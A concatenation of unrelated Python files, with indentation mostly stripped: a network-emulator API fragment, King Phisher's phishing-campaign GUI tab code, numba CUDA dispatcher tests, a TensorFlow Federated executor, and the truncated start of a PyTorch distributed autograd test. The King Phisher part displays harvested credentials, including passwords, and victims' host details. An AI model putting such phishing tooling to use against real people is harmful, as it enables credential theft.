uuid = vnf_status['id']
query = query.replace('<uuid>', uuid)
#if needed, replace interface id with emu-intfs name
# query = query.replace('<intf>', vnf_interface)
logging.info('query: {0}'.format(query))
try:
c = self.net.monitor_agent.query_Prometheus(query)
return c
except Exception as ex:
logging.exception("RPC error.")
return ex.message
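# Illustrative sketch (not part of the original file): how a command line
# client could reach the endpoint above through zerorpc. The address, port
# and VNF names are example values only.
def example_network_chain_start(api_address="tcp://127.0.0.1:5151"):
    client = zerorpc.Client()
    client.connect(api_address)
    # Invokes DCNetworkApi.network_action_start() on the server side.
    return client.network_action_start("vnf1", "vnf2", {"bidirectional": True})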
|
campaign.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/client/tabs/campaign.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import datetime
import logging
import threading
import time
from king_phisher import utilities
from king_phisher.client import export
from king_phisher.client import graphs
from king_phisher.client import gui_utilities
from gi.repository import Gdk
from gi.repository import GLib
from gi.repository import Gtk
class CampaignViewGenericTab(gui_utilities.UtilityGladeGObject):
"""
This object is meant to be subclassed by all of the tabs which load and
display information about the current campaign.
"""
label_text = 'Unknown'
"""The label of the tab for display in the GUI."""
top_gobject = 'box'
def __init__(self, *args, **kwargs):
self.label = Gtk.Label(label=self.label_text)
"""The :py:class:`Gtk.Label` representing this tab with text from :py:attr:`~.CampaignViewGenericTab.label_text`."""
super(CampaignViewGenericTab, self).__init__(*args, **kwargs)
self.is_destroyed = threading.Event()
getattr(self, self.top_gobject).connect('destroy', self.signal_destroy)
self.last_load_time = float('-inf')
"""The last time the data was loaded from the server."""
self.refresh_frequency = utilities.timedef_to_seconds(str(self.config.get('gui.refresh_frequency', '5m')))
"""The lifetime in seconds to wait before refreshing the data from the server."""
self.loader_thread = None
"""The thread object which loads the data from the server."""
self.loader_thread_lock = threading.Lock()
"""The :py:class:`threading.Lock` object used for synchronization between the loader and main threads."""
def load_campaign_information(self, force=False):
raise NotImplementedError()
def signal_button_clicked_refresh(self, button):
self.load_campaign_information(force=True)
def signal_destroy(self, gobject):
self.is_destroyed.set()
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
self.logger.debug("waiting on thread: {0}.loader_thread (tid: 0x{1:x})".format(self.__class__.__name__, self.loader_thread.ident))
while self.loader_thread.is_alive():
gui_utilities.gtk_sync()
self.logger.debug("joined thread: {0}.loader_thread (tid: 0x{1:x})".format(self.__class__.__name__, self.loader_thread.ident))
class CampaignViewGenericTableTab(CampaignViewGenericTab):
"""
This object is meant to be subclassed by tabs which will display
campaign information of different types from specific database
tables. The data in this object is refreshed when multiple events
occur and it uses an internal timer to represent the last time the
data was refreshed.
"""
gobject_ids = [
'button_refresh',
'treeview_campaign'
]
remote_table_name = ''
"""The database table represented by this tab."""
view_columns = {}
"""The dictionary map of column numbers to column names starting at column 1."""
def __init__(self, *args, **kwargs):
super(CampaignViewGenericTableTab, self).__init__(*args, **kwargs)
treeview = self.gobjects['treeview_campaign']
treeview.get_selection().set_mode(Gtk.SelectionMode.MULTIPLE)
popup_copy_submenu = Gtk.Menu.new()
self.view_column_renderers = {}
columns = self.view_columns
for column_id in range(1, len(columns) + 1):
column_name = columns[column_id]
column = Gtk.TreeViewColumn(column_name, Gtk.CellRendererText(), text=column_id)
column.set_sort_column_id(column_id)
treeview.append_column(column)
self.view_column_renderers[column_id] = column
menu_item = Gtk.MenuItem.new_with_label(column_name)
menu_item.connect('activate', self.signal_activate_popup_menu_copy, column_id)
popup_copy_submenu.append(menu_item)
self.popup_menu = Gtk.Menu.new()
"""The :py:class:`Gtk.Menu` object which is displayed when right-clicking in the view area."""
menu_item = Gtk.MenuItem.new_with_label('Copy')
menu_item.set_submenu(popup_copy_submenu)
self.popup_menu.append(menu_item)
menu_item = Gtk.SeparatorMenuItem()
self.popup_menu.append(menu_item)
menu_item = Gtk.MenuItem.new_with_label('Delete')
menu_item.connect('activate', lambda _: self._prompt_to_delete_row())
self.popup_menu.append(menu_item)
self.popup_menu.show_all()
def _prompt_to_delete_row(self):
selection = self.gobjects['treeview_campaign'].get_selection()
if not selection.count_selected_rows():
return
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
gui_utilities.show_dialog_warning('Can Not Delete Rows While Loading', self.parent)
return
(model, tree_paths) = selection.get_selected_rows()
if not tree_paths:
return
tree_iters = map(model.get_iter, tree_paths)
row_ids = map(lambda ti: model.get_value(ti, 0), tree_iters)
if len(row_ids) == 1:
message = 'Delete This Row?'
else:
message = "Delete These {0:,} Rows?".format(len(row_ids))
if not gui_utilities.show_dialog_yes_no(message, self.parent, 'This information will be lost.'):
return
for row_id in row_ids:
self.parent.rpc(self.remote_table_name + '/delete', row_id)
self.load_campaign_information(force=True)
def format_row_data(self, row):
"""
This method is overridden by subclasses to format the raw row
data returned from the server. The length of the list must equal
the number of columns in the table. This method is called for
each row in the remote table by the loader thread.
:return: The formatted row data.
:rtype: list
"""
raise NotImplementedError()
def format_cell_data(self, cell_data):
"""
This method provides formatting to the individual cell values returned
from the :py:meth:`.format_row_data` function. Values are converted into
a format suitable for reading.
:param cell_data: The value to format.
:return: The formatted cell value.
:rtype: str
"""
if isinstance(cell_data, datetime.datetime):
cell_data = utilities.datetime_utc_to_local(cell_data)
return utilities.format_datetime(cell_data)
elif cell_data == None:
return ''
return str(cell_data)
def load_campaign_information(self, force=False):
"""
Load the necessary campaign information from the remote server.
Unless *force* is True, the
:py:attr:`~.CampaignViewGenericTab.last_load_time` is compared
with the :py:attr:`~.CampaignViewGenericTab.refresh_frequency` to
check if the information is stale. If the local data is not stale,
this function will return without updating the table.
:param bool force: Ignore the load life time and force loading the remote data.
"""
if not force and ((time.time() - self.last_load_time) < self.refresh_frequency):
return
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
return
self.loader_thread_lock.acquire()
treeview = self.gobjects['treeview_campaign']
store = treeview.get_model()
if store == None:
store_columns = [str]
map(lambda x: store_columns.append(str), range(len(self.view_columns)))
store = Gtk.ListStore(*store_columns)
treeview.set_model(store)
else:
store.clear()
self.loader_thread = threading.Thread(target=self.loader_thread_routine, args=(store,))
self.loader_thread.daemon = True
self.loader_thread.start()
self.loader_thread_lock.release()
return
def loader_thread_routine(self, store):
"""
The loading routine to be executed within a thread.
:param store: The store object to place the new data.
:type store: :py:class:`Gtk.ListStore`
"""
gui_utilities.glib_idle_add_wait(lambda: self.gobjects['treeview_campaign'].set_property('sensitive', False))
for row_data in self.parent.rpc.remote_table('campaign/' + self.remote_table_name, self.config['campaign_id']):
if self.is_destroyed.is_set():
break
row_id = row_data['id']
row_data = self.format_row_data(row_data)
if row_data == None:
self.parent.rpc(self.remote_table_name + '/delete', row_id)
continue
row_data = list(map(self.format_cell_data, row_data))
row_data.insert(0, str(row_id))
gui_utilities.glib_idle_add_wait(store.append, row_data)
if self.is_destroyed.is_set():
return
gui_utilities.glib_idle_add_wait(lambda: self.gobjects['treeview_campaign'].set_property('sensitive', True))
self.last_load_time = time.time()
def signal_button_clicked_export(self, button):
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
gui_utilities.show_dialog_warning('Can Not Export Rows While Loading', self.parent)
return
dialog = gui_utilities.UtilityFileChooser('Export Data', self.parent)
file_name = self.config['campaign_name'] + '.csv'
response = dialog.run_quick_save(file_name)
dialog.destroy()
if not response:
return
destination_file = response['target_path']
export.treeview_liststore_to_csv(self.gobjects['treeview_campaign'], destination_file)
def signal_treeview_button_pressed(self, widget, event):
if not (event.type == Gdk.EventType.BUTTON_PRESS and event.button == 3):
return
selection = self.gobjects['treeview_campaign'].get_selection()
if not selection.count_selected_rows():
return
pos_func = lambda m, d: (event.get_root_coords()[0], event.get_root_coords()[1], True)
self.popup_menu.popup(None, None, pos_func, None, event.button, event.time)
return True
def signal_treeview_key_pressed(self, widget, event):
if event.type != Gdk.EventType.KEY_PRESS:
return
treeview = self.gobjects['treeview_campaign']
keyval = event.get_keyval()[1]
if event.get_state() == Gdk.ModifierType.CONTROL_MASK:
if keyval == Gdk.KEY_c:
gui_utilities.gtk_treeview_selection_to_clipboard(treeview)
elif keyval == Gdk.KEY_F5:
self.load_campaign_information(force=True)
elif keyval == Gdk.KEY_Delete:
self._prompt_to_delete_row()
def signal_activate_popup_menu_copy(self, widget, column_id):
treeview = self.gobjects['treeview_campaign']
gui_utilities.gtk_treeview_selection_to_clipboard(treeview, column_id)
class CampaignViewDeaddropTab(CampaignViewGenericTableTab):
"""Display campaign information regarding dead drop connections."""
remote_table_name = 'deaddrop_connections'
label_text = 'Deaddrop'
view_columns = {
1: 'Destination',
2: 'Visit Count',
3: 'External IP',
4: 'Username',
5: 'Hostname',
6: 'Local IP Addresses',
7: 'First Hit',
8: 'Last Hit'
}
def format_row_data(self, connection):
deploy_id = connection['deployment_id']
deploy_details = self.parent.rpc.remote_table_row('deaddrop_deployments', deploy_id, cache=True)
if not deploy_details:
return None
row = (
deploy_details['destination'],
connection['visit_count'],
connection['visitor_ip'],
connection['local_username'],
connection['local_hostname'],
connection['local_ip_addresses'],
connection['first_visit'],
connection['last_visit']
)
return row
class CampaignViewCredentialsTab(CampaignViewGenericTableTab):
"""Display campaign information regarding submitted credentials."""
remote_table_name = 'credentials'
label_text = 'Credentials'
view_columns = {
1: 'Email',
2: 'Username',
3: 'Password',
4: 'Submitted'
}
def __init__(self, *args, **kwargs):
super(CampaignViewCredentialsTab, self).__init__(*args, **kwargs)
self.view_column_renderers[3].set_property('visible', False)
def format_row_data(self, credential):
msg_id = credential['message_id']
msg_details = self.parent.rpc.remote_table_row('messages', msg_id, cache=True)
if not msg_details:
return None
row = (
msg_details['target_email'],
credential['username'],
credential['password'],
credential['submitted']
)
return row
def signal_button_toggled_show_passwords(self, button):
self.view_column_renderers[3].set_property('visible', button.get_property('active'))
class CampaignViewDashboardTab(CampaignViewGenericTab):
"""Display campaign information on a graphical dash board."""
gobject_ids = [
'box_top_left',
'box_top_right',
'box_bottom',
'scrolledwindow_top_left',
'scrolledwindow_top_right',
'scrolledwindow_bottom'
]
label_text = 'Dashboard'
"""The tabs label for display in the GUI."""
def __init__(self, *args, **kwargs):
super(CampaignViewDashboardTab, self).__init__(*args, **kwargs)
self.graphs = []
"""The :py:class:`.CampaignGraph` classes represented on the dash board."""
# Position: (DefaultGraphName, Size)
dash_ports = {
'top_left': (380, 200),
'top_right': (380, 200),
'bottom': None
}
for dash_port, details in dash_ports.items():
graph_name = self.config['dashboard.' + dash_port]
Klass = graphs.get_graph(graph_name)
if not Klass:
self.logger.warning('could not get graph: ' + graph_name)
continue
graph_inst = Klass(self.config, self.parent, details)
self.gobjects['scrolledwindow_' + dash_port].add_with_viewport(graph_inst.canvas)
self.gobjects['box_' + dash_port].pack_end(graph_inst.navigation_toolbar, False, False, 0)
self.graphs.append(graph_inst)
self.logger.debug("dashboard refresh frequency set to {0} seconds".format(self.refresh_frequency))
GLib.timeout_add_seconds(self.refresh_frequency, self.loader_idle_routine)
def load_campaign_information(self, force=False):
"""
Load the necessary campaign information from the remote server.
Unless *force* is True, the
:py:attr:`~.CampaignViewDashboardTab.last_load_time` is compared
with the :py:attr:`~.CampaignViewDashboardTab.refresh_frequency` to
check if the information is stale. If the local data is not
stale, this function will return without updating the table.
:param bool force: Ignore the load life time and force loading the remote data.
"""
if not force and ((time.time() - self.last_load_time) < self.refresh_frequency):
return
if not hasattr(self.parent, 'rpc'):
self.logger.warning('skipping load_campaign_information because rpc is not initialized')
return
with self.loader_thread_lock:
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
return
self.loader_thread = threading.Thread(target=self.loader_thread_routine)
self.loader_thread.daemon = True
self.loader_thread.start()
def loader_idle_routine(self):
"""The routine which refreshes the campaign data at a regular interval."""
self.logger.debug('idle loader routine called')
self.load_campaign_information(force=True)
return True
def loader_thread_routine(self):
"""The loading routine to be executed within a thread."""
info_cache = {}
for graph in self.graphs:
if self.is_destroyed.is_set():
break
info_cache = gui_utilities.glib_idle_add_wait(lambda: graph.refresh(info_cache, self.is_destroyed))
self.last_load_time = time.time()
class CampaignViewVisitsTab(CampaignViewGenericTableTab):
"""Display campaign information regarding incoming visitors."""
remote_table_name = 'visits'
label_text = 'Visits'
view_columns = {
1: 'Email',
2: 'Visitor IP',
3: 'Visitor Details',
4: 'Visit Count',
5: 'First Visit',
6: 'Last Visit'
}
def format_row_data(self, visit):
msg_id = visit['message_id']
msg_details = self.parent.rpc.remote_table_row('messages', msg_id, cache=True)
if not msg_details:
return None
row = (
msg_details['target_email'],
visit['visitor_ip'],
visit['visitor_details'],
visit['visit_count'],
visit['first_visit'],
visit['last_visit']
)
return row
class CampaignViewMessagesTab(CampaignViewGenericTableTab):
"""Display campaign information regarding sent messages."""
remote_table_name = 'messages'
label_text = 'Messages'
view_columns = {
1: 'Email',
2: 'Sent',
3: 'Opened',
4: 'Trained'
}
def format_row_data(self, message):
row = (
message['target_email'],
message['sent'],
message['opened'],
('Yes' if message['trained'] else '')
)
return row
class CampaignViewTab(object):
"""
The King Phisher client top-level 'View Campaign' tab. This object
manages the sub-tabs which display all the information regarding
the current campaign.
"""
def __init__(self, config, parent):
"""
:param dict config: The King Phisher client configuration.
:param parent: The parent window for this object.
:type parent: :py:class:`Gtk.Window`
"""
self.config = config
self.parent = parent
self.logger = logging.getLogger('KingPhisher.Client.' + self.__class__.__name__)
self.box = Gtk.Box()
self.box.set_property('orientation', Gtk.Orientation.VERTICAL)
self.box.show()
self.label = Gtk.Label(label='View Campaign')
"""The :py:class:`Gtk.Label` representing this tabs name."""
self.notebook = Gtk.Notebook()
""" The :py:class:`Gtk.Notebook` for holding sub-tabs."""
self.notebook.connect('switch-page', self.signal_notebook_switch_page)
self.notebook.set_scrollable(True)
self.box.pack_start(self.notebook, True, True, 0)
self.tabs = {}
"""A dict object holding the sub tabs managed by this object."""
current_page = self.notebook.get_current_page()
self.last_page_id = current_page
if graphs.has_matplotlib:
self.logger.info('matplotlib is installed, dashboard will be available')
dashboard_tab = CampaignViewDashboardTab(self.config, self.parent)
self.tabs['dashboard'] = dashboard_tab
self.notebook.append_page(dashboard_tab.box, dashboard_tab.label)
else:
self.logger.warning('matplotlib is not installed, dashboard will not be available')
messages_tab = CampaignViewMessagesTab(self.config, self.parent)
self.tabs['messages'] = messages_tab
self.notebook.append_page(messages_tab.box, messages_tab.label)
visits_tab = CampaignViewVisitsTab(self.config, self.parent)
self.tabs['visits'] = visits_tab
self.notebook.append_page(visits_tab.box, visits_tab.label)
credentials_tab = CampaignViewCredentialsTab(self.config, self.parent)
self.tabs['credentials'] = credentials_tab
self.notebook.append_page(credentials_tab.box, credentials_tab.label)
deaddrop_connections_tab = CampaignViewDeaddropTab(self.config, self.parent)
self.tabs['deaddrop_connections'] = deaddrop_connections_tab
self.notebook.append_page(deaddrop_connections_tab.box, deaddrop_connections_tab.label)
for tab in self.tabs.values():
tab.box.show()
self.notebook.show()
self.parent.connect('campaign-set', self.signal_kpc_campaign_set)
def signal_kpc_campaign_set(self, kpc, cid):
for tab_name, tab in self.tabs.items():
if hasattr(tab, 'load_campaign_information'):
tab.load_campaign_information(force=True)
def signal_notebook_switch_page(self, notebook, current_page, index):
if not hasattr(self.parent, 'rpc'):
return
#previous_page = notebook.get_nth_page(self.last_page_id)
self.last_page_id = index
for tab_name, tab in self.tabs.items():
if current_page != tab.box:
continue
if hasattr(tab, 'load_campaign_information'):
tab.load_campaign_information()
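# Illustrative sketch (not part of the original file): the staleness check and
# single-loader-thread pattern used by load_campaign_information() above,
# reduced to plain threading. The 300 second default and the _Example* names
# are placeholders, not King Phisher APIs.
class _ExampleRefresher(object):
    def __init__(self, refresh_frequency=300):
        self.refresh_frequency = refresh_frequency
        self.last_load_time = float('-inf')
        self.loader_thread = None
        self.loader_thread_lock = threading.Lock()
    def load(self, force=False):
        if not force and ((time.time() - self.last_load_time) < self.refresh_frequency):
            return  # local data is still fresh
        if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
            return  # a load is already in progress
        with self.loader_thread_lock:
            self.loader_thread = threading.Thread(target=self._loader_routine)
            self.loader_thread.daemon = True
            self.loader_thread.start()
    def _loader_routine(self):
        # Fetch the remote rows here, then record when the data was loaded.
        self.last_load_time = time.time()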
|
test_dispatcher.py
|
import numpy as np
import threading
from numba import cuda, float32, float64, int32, int64, void
from numba.cuda.testing import skip_on_cudasim, unittest, CUDATestCase
import math
def add(x, y):
return x + y
def add_kernel(r, x, y):
r[0] = x + y
@skip_on_cudasim('Dispatcher objects not used in the simulator')
class TestDispatcher(CUDATestCase):
def _test_no_double_specialize(self, dispatcher, ty):
with self.assertRaises(RuntimeError) as e:
dispatcher.specialize(ty)
self.assertIn('Dispatcher already specialized', str(e.exception))
def test_no_double_specialize_sig_same_types(self):
# Attempting to specialize a kernel jitted with a signature is illegal,
# even for the same types the kernel is already specialized for.
@cuda.jit('void(float32[::1])')
def f(x):
pass
self._test_no_double_specialize(f, float32[::1])
def test_no_double_specialize_no_sig_same_types(self):
# Attempting to specialize an already-specialized kernel is illegal,
# even for the same types the kernel is already specialized for.
@cuda.jit
def f(x):
pass
f_specialized = f.specialize(float32[::1])
self._test_no_double_specialize(f_specialized, float32[::1])
def test_no_double_specialize_sig_diff_types(self):
# Attempting to specialize a kernel jitted with a signature is illegal.
@cuda.jit('void(int32[::1])')
def f(x):
pass
self._test_no_double_specialize(f, float32[::1])
def test_no_double_specialize_no_sig_diff_types(self):
# Attempting to specialize an already-specialized kernel is illegal.
@cuda.jit
def f(x):
pass
f_specialized = f.specialize(int32[::1])
self._test_no_double_specialize(f_specialized, float32[::1])
def test_specialize_cache_same(self):
# Ensure that the same dispatcher is returned for the same argument
# types, and that different dispatchers are returned for different
# argument types.
@cuda.jit
def f(x):
pass
self.assertEqual(len(f.specializations), 0)
f_float32 = f.specialize(float32[::1])
self.assertEqual(len(f.specializations), 1)
f_float32_2 = f.specialize(float32[::1])
self.assertEqual(len(f.specializations), 1)
self.assertIs(f_float32, f_float32_2)
f_int32 = f.specialize(int32[::1])
self.assertEqual(len(f.specializations), 2)
self.assertIsNot(f_int32, f_float32)
def test_specialize_cache_same_with_ordering(self):
# Ensure that the same dispatcher is returned for the same argument
# types, and that different dispatchers are returned for different
# argument types, taking into account array ordering and multiple
# arguments.
@cuda.jit
def f(x, y):
pass
self.assertEqual(len(f.specializations), 0)
# 'A' order specialization
f_f32a_f32a = f.specialize(float32[:], float32[:])
self.assertEqual(len(f.specializations), 1)
# 'C' order specialization
f_f32c_f32c = f.specialize(float32[::1], float32[::1])
self.assertEqual(len(f.specializations), 2)
self.assertIsNot(f_f32a_f32a, f_f32c_f32c)
# Reuse 'C' order specialization
f_f32c_f32c_2 = f.specialize(float32[::1], float32[::1])
self.assertEqual(len(f.specializations), 2)
self.assertIs(f_f32c_f32c, f_f32c_f32c_2)
# The following tests are based on those in numba.tests.test_dispatcher
def test_coerce_input_types(self):
# Do not allow unsafe conversions if we can still compile other
# specializations.
c_add = cuda.jit(add_kernel)
# Using a complex128 allows us to represent any result produced by the
# test
r = np.zeros(1, dtype=np.complex128)
c_add[1, 1](r, 123, 456)
self.assertEqual(r[0], add(123, 456))
c_add[1, 1](r, 12.3, 45.6)
self.assertEqual(r[0], add(12.3, 45.6))
c_add[1, 1](r, 12.3, 45.6j)
self.assertEqual(r[0], add(12.3, 45.6j))
c_add[1, 1](r, 12300000000, 456)
self.assertEqual(r[0], add(12300000000, 456))
# Now force compilation of only a single specialization
c_add = cuda.jit('(i4[::1], i4, i4)')(add_kernel)
r = np.zeros(1, dtype=np.int32)
c_add[1, 1](r, 123, 456)
self.assertPreciseEqual(r[0], add(123, 456))
@unittest.expectedFailure
def test_coerce_input_types_unsafe(self):
# Implicit (unsafe) conversion of float to int, originally from
# test_coerce_input_types. This test presently fails with the CUDA
# Dispatcher because argument preparation is done by
# _Kernel._prepare_args, which is currently inflexible with respect to
# the types it can accept when preparing.
#
# This test is marked as xfail until future changes enable this
# behavior.
c_add = cuda.jit('(i4[::1], i4, i4)')(add_kernel)
r = np.zeros(1, dtype=np.int32)
c_add[1, 1](r, 12.3, 45.6)
self.assertPreciseEqual(r[0], add(12, 45))
def test_coerce_input_types_unsafe_complex(self):
# Implicit conversion of complex to int disallowed
c_add = cuda.jit('(i4[::1], i4, i4)')(add_kernel)
r = np.zeros(1, dtype=np.int32)
with self.assertRaises(TypeError):
c_add[1, 1](r, 12.3, 45.6j)
def test_ambiguous_new_version(self):
"""Test compiling new version in an ambiguous case
"""
c_add = cuda.jit(add_kernel)
r = np.zeros(1, dtype=np.float64)
INT = 1
FLT = 1.5
c_add[1, 1](r, INT, FLT)
self.assertAlmostEqual(r[0], INT + FLT)
self.assertEqual(len(c_add.overloads), 1)
c_add[1, 1](r, FLT, INT)
self.assertAlmostEqual(r[0], FLT + INT)
self.assertEqual(len(c_add.overloads), 2)
c_add[1, 1](r, FLT, FLT)
self.assertAlmostEqual(r[0], FLT + FLT)
self.assertEqual(len(c_add.overloads), 3)
# The following call is ambiguous because (int, int) can resolve
# to (float, int) or (int, float) with equal weight.
c_add[1, 1](r, 1, 1)
self.assertAlmostEqual(r[0], INT + INT)
self.assertEqual(len(c_add.overloads), 4, "didn't compile a new "
"version")
def test_lock(self):
"""
Test that (lazy) compiling from several threads at once doesn't
produce errors (see issue #908).
"""
errors = []
@cuda.jit
def foo(r, x):
r[0] = x + 1
def wrapper():
try:
r = np.zeros(1, dtype=np.int64)
foo[1, 1](r, 1)
self.assertEqual(r[0], 2)
except Exception as e:
errors.append(e)
threads = [threading.Thread(target=wrapper) for i in range(16)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertFalse(errors)
def test_get_regs_per_thread_unspecialized(self):
# A kernel where the register usage per thread is likely to differ
# between different specializations
@cuda.jit
def pi_sin_array(x, n):
i = cuda.grid(1)
if i < n:
x[i] = 3.14 * math.sin(x[i])
# Call the kernel with different arguments to create two different
# definitions within the Dispatcher object
N = 10
arr_f32 = np.zeros(N, dtype=np.float32)
arr_f64 = np.zeros(N, dtype=np.float64)
pi_sin_array[1, N](arr_f32, N)
pi_sin_array[1, N](arr_f64, N)
# Check we get a positive integer for the two different variations
sig_f32 = void(float32[::1], int64)
sig_f64 = void(float64[::1], int64)
regs_per_thread_f32 = pi_sin_array.get_regs_per_thread(sig_f32)
regs_per_thread_f64 = pi_sin_array.get_regs_per_thread(sig_f64)
self.assertIsInstance(regs_per_thread_f32, int)
self.assertIsInstance(regs_per_thread_f64, int)
self.assertGreater(regs_per_thread_f32, 0)
self.assertGreater(regs_per_thread_f64, 0)
# Check that getting the registers per thread for all signatures
# provides the same values as getting the registers per thread for
# individual signatures.
regs_per_thread_all = pi_sin_array.get_regs_per_thread()
self.assertEqual(regs_per_thread_all[sig_f32.args],
regs_per_thread_f32)
self.assertEqual(regs_per_thread_all[sig_f64.args],
regs_per_thread_f64)
if regs_per_thread_f32 == regs_per_thread_f64:
# If the register usage is the same for both variants, there may be
# a bug, but this may also be an artifact of the compiler / driver
# / device combination, so produce an informational message only.
print('f32 and f64 variant thread usages are equal.')
print('This may warrant some investigation. Devices:')
cuda.detect()
def test_get_regs_per_thread_specialized(self):
@cuda.jit(void(float32[::1], int64))
def pi_sin_array(x, n):
i = cuda.grid(1)
if i < n:
x[i] = 3.14 * math.sin(x[i])
# Check we get a positive integer for the specialized variation
regs_per_thread = pi_sin_array.get_regs_per_thread()
self.assertIsInstance(regs_per_thread, int)
self.assertGreater(regs_per_thread, 0)
def test_dispatcher_docstring(self):
# Ensure that CUDA-jitting a function preserves its docstring. See
# Issue #5902: https://github.com/numba/numba/issues/5902
@cuda.jit
def add_kernel(a, b):
"""Add two integers, kernel version"""
@cuda.jit(device=True)
def add_device(a, b):
"""Add two integers, device version"""
self.assertEqual("Add two integers, kernel version", add_kernel.__doc__)
self.assertEqual("Add two integers, device version", add_device.__doc__)
if __name__ == '__main__':
unittest.main()
|
concurrent_executor.py
|
# Lint as: python3
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A concurrent executor that does work asynchronously in multiple threads."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import asyncio
import functools
import threading
from tensorflow_federated.python.common_libs import py_typecheck
from tensorflow_federated.python.core.impl import executor_base
class ConcurrentExecutor(executor_base.Executor):
"""The concurrent executor delegates work to a separate thread.
This executor only handles threading. It delegates all execution to an
underlying pool of target executors.
NOTE: This component is only available in Python 3.
"""
# TODO(b/134543154): Upgrade this to a threadpool with multiple workers,
# possibly one that could be shared among multiple of these executors.
def __init__(self, target_executor):
"""Creates a concurrent executor backed by a target executor.
Args:
target_executor: The executor that does all the work.
"""
py_typecheck.check_type(target_executor, executor_base.Executor)
self._target_executor = target_executor
self._event_loop = asyncio.new_event_loop()
def run_loop(loop):
loop.run_forever()
loop.close()
self._thread = threading.Thread(
target=functools.partial(run_loop, self._event_loop))
self._thread.start()
def __del__(self):
self._event_loop.call_soon_threadsafe(self._event_loop.stop)
self._thread.join()
def _delegate(self, coro):
return asyncio.wrap_future(
asyncio.run_coroutine_threadsafe(coro, self._event_loop))
async def create_value(self, value, type_spec=None):
return await self._delegate(
self._target_executor.create_value(value, type_spec))
async def create_call(self, comp, arg=None):
return await self._delegate(self._target_executor.create_call(comp, arg))
async def create_tuple(self, elements):
return await self._delegate(self._target_executor.create_tuple(elements))
async def create_selection(self, source, index=None, name=None):
return await self._delegate(
self._target_executor.create_selection(source, index=index, name=name))
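# Illustrative sketch (not part of the original file): the pattern the executor
# above relies on -- run an event loop on a private thread and hand coroutines
# to it with asyncio.run_coroutine_threadsafe. The coroutine and function names
# here are placeholders, not TFF APIs.
def _example_delegate_to_loop_thread():
  loop = asyncio.new_event_loop()
  thread = threading.Thread(target=loop.run_forever)
  thread.start()
  async def work():
    return 42
  try:
    # run_coroutine_threadsafe returns a concurrent.futures.Future.
    return asyncio.run_coroutine_threadsafe(work(), loop).result()
  finally:
    loop.call_soon_threadsafe(loop.stop)
    thread.join()
    loop.close()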
|
dist_autograd_test.py
|
import sys
import threading
import time
import unittest
from enum import Enum
import random
import torch
from datetime import timedelta
import torch.distributed as dist
import torch.distributed.autograd as dist_autograd
import torch.distributed.rpc as rpc
import torch.testing._internal.dist_utils
from torch.autograd import Function
from torch.autograd.function import once_differentiable
from torch.distributed.rpc import RRef
from torch.testing._internal.common_utils import IS_MACOS
from torch.testing._internal.dist_utils import (
dist_init,
initialize_pg,
wait_until_node_failure,
worker_name,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
from torch.testing._internal.common_distributed import skip_if_lt_x_gpu
# Right now we test up to 3-layer nested rpc calls.
# rpc_done[1] and ctx_ids[1] represent rpc is done in prev rank, and context id
# sent from prev rank respectively.
# rpc_done[2] and ctx_ids[2] represents for prev of prev rank.
# rpc_done[3] and ctx_ids[3] represents for prev of prev of prev rank.
# rpc_done[0] and ctx_ids[0] represents for current rank, but mostly not used.
rpc_done = [False, False, False, False]
ctx_ids = [-1, -1, -1, -1]
known_context_ids = set()
requires_grad_tensor = torch.ones(3, 3, requires_grad=True)
# Send rpc done info and context_id to
# dst_rank = (self.rank + rank_distance) % self.world_size
# we don't need a lock here since the GIL is held while executing remote
# python UDFs, so access is serialized across several workers.
def _set_rpc_done(ctx_id, rank_distance):
global rpc_done
global ctx_ids
global known_context_ids
rpc_done[rank_distance] = True
ctx_ids[rank_distance] = ctx_id
known_context_ids.add(ctx_id)
def _check_rpc_done(rank_distance):
while not rpc_done[rank_distance]:
time.sleep(0.1)
def _torch_ones(sizes, requires_grad=False):
return torch.ones(sizes, requires_grad=requires_grad)
# This method must be called on the rref owner, and verifies that the grad of
# rref tensor equals the given grad.
def _compare_owner_value(context_id, rref, grad):
grads = dist_autograd.get_gradients(context_id)
return torch.equal(grads[rref.local_value()], grad)
def create_tensor():
